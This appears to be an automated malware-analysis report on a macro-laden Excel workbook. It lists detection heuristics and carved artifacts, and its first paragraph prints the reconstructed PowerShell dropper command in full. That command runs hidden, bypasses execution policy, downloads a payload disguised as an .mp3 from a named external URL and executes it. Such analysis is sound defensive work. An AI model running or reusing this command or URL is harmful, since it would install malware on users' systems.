Malware Insights
The Workbook_Open macro executes an obfuscated PowerShell command that downloads a file from a URL and then executes it. The PowerShell command is reconstructed as 'powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } –PassThru; Invoke-WebRequest -Uri "https://fnvimoyvwkbxbmczlqus.supabase.co/storage/v1/object/public/auths0/01/Honrghsmrei.mp3" -OutFile $TempFile; Start-Process $TempFile;'. This indicates the intent to download and execute a second-stage payload.
Heuristics 7
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usage
-
Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URLVBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA project inside OOXML medium OOXML_VBADocument contains a VBA project — VBA macros present
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://fnvimoyvwkbxbmczlqus.supabase.co/storage/v1/object/public/auths0/01/Honrghsmrei.mp3
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas9d0b5f72dfc1996d8f73addc28ff4c981bdc95989810c314be7df355d7b753b1 |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1345 bytes |
vbaProject_00.bin754976b074f03f79d3e3d7b2cea2c7cd4691801563fa1455b6b77daecca9086d |
vba-project | OOXML VBA project: xl/vbaProject.bin | 4608 bytes |
Open this report in the interactive analyzer, or submit your own file for analysis.